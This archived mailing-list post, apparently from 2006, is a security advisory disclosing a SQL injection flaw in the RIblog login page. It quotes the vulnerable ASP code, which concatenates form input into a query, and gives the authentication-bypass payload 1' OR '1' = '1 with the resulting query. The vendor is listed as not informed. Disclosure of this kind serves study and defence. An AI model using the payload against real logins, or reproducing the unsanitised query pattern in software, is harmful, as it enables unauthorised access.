Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Vuln-Dev
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

RIblog Remote SQL Injection Exploit

from [omnipresent] Network Security [Permanent Link]
Subject: RIblog Remote SQL Injection Exploit
Date: 23 Apr 2006 10:32:11 -0000 
------------------------------------------------------------------
          - RIblog Remote SQL Injection Exploit -
   -= http://colander.altervista.org/advisory/riblog.txt =-
------------------------------------------------------------------

                        -= RIblog =-



Omnipresent
April 21, 2006


Vunerability(s):
----------------
SQL Injection


Product:
--------
bloggage

Vendor:
--------
http://romedahl.com


Description of product:
-----------------------

It is a Blog.

Not Available Yet.


Vulnerability / Exploit:
------------------------

This software is vulnerable to a Remote SQL Injection.

Take a look of this script in 

[...]

doLogin = Request.Form("login") 'login


If doLogin = "" Then

 Trim(Request.Form("login"))

End If

' Submit to self
If doLogin = "true" Then


                        If sUserName = "" Then
                         sUserName = Trim(Request.Form("UserName"))
                        End If

                        If sPassword = "" Then
                         sPassword = Trim(Request.Form("Password"))
                        End If


                        Set myRecSet = server.createobject("adodb.recordset")
                        strConn = "Provider=Microsoft.Jet.OLEDB.4.0;Data 
Source=" & strDBPath & ";"
                        Set myConn = server.createobject("adodb.connection")
                        myConn.open strConn

                        strSQL = "SELECT * FROM tUser WHERE  fuser = '"& 
sUserName  &"' and fpassword = '" & sPassword &"';"


[...]

As you can see, the string strSQL is the query passed to the DB. And the 
variables sUserName and sPassword are not properly
sanitised. So, an attacker can exploit this vulnerability by injection SQL 
Code. Like the example below:

1' OR '1' = '1

The attacker have to put the string above in the username and password fields.


the query will be:

strSQL = "SELECT * FROM tUser WHERE  fuser = '1' OR '1' ='1' and fpassword = 
'1' OR '1' ='1';

The attacker can gain access to the blog and edit, view comments, etc, etc.


Vendor Status
-------------

Not informed!

Credits:
--------
omnipresent
omnipresent@email.it
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • RIblog Remote SQL Injection Exploit, omnipresent <=
Previous by Date:  [MajorSecurity] TotalCalendar 2.30 - Remote File Include Vulnerability, admin
Next by Date:  Re: evoBlog Remote Name tag Script injection, daniel
Previous by Thread:  [MajorSecurity] TotalCalendar 2.30 - Remote File Include Vulnerability, admin
Next by Thread:  Re: evoBlog Remote Name tag Script injection, daniel
Indexes:  [Date] [Thread] [Top] [All Lists]